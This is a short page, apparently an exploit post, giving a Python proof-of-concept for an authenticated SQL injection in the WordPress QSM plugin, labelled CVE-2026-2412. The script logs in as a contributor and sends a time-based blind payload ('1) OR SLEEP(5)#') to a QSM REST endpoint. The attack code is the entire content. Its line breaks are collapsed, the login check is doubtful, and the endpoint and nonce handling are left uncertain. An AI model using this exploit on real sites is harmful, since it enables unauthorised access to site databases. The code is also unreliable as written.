CVE-2026-2412: WordPress QSM插件SQL注入漏洞

#!/usr/bin/env python3 # PoC for CVE-2026-2412: Authenticated SQL Injection in QSM Plugin import requests import sys def exploit(url, username, password): session = requests.Session() # 1. Login as Contributor (Low privilege user) login_url = f"{url}/wp-login.php" login_data = { "log": username, "pwd": password, "redirect_to": f"{url}/wp-admin/", "testcookie": "1" } print(f"[*] Logging in as {username}...") session.post(login_url, data=login_data) # Check if login successful if 'wp-admin' not in session.cookies.get_dict(): print("[-] Login failed.") return # 2. Send Payload to vulnerable endpoint # The vulnerability is in the 'merged_question' parameter # Payload: 1) OR SLEEP(5)# to test for time-based blind injection target_endpoint = f"{url}/wp-json/qsm/v1/questions/merge" # Endpoint might vary based on plugin version payload = "1) OR SLEEP(5)#" headers = { "Content-Type": "application/json", "X-WP-Nonce": "" # Nonce might be required depending on REST API config } # Fetch nonce if necessary (omitted for brevity, assuming REST API is accessible) data = { "merged_question": payload } print(f"[*] Sending payload to {target_endpoint}") try: response = session.post(target_endpoint, json=data, headers=headers, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! Response delayed by 5 seconds.") else: print("[-] Vulnerability not triggered or patched.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <url> <username> <password>") sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3])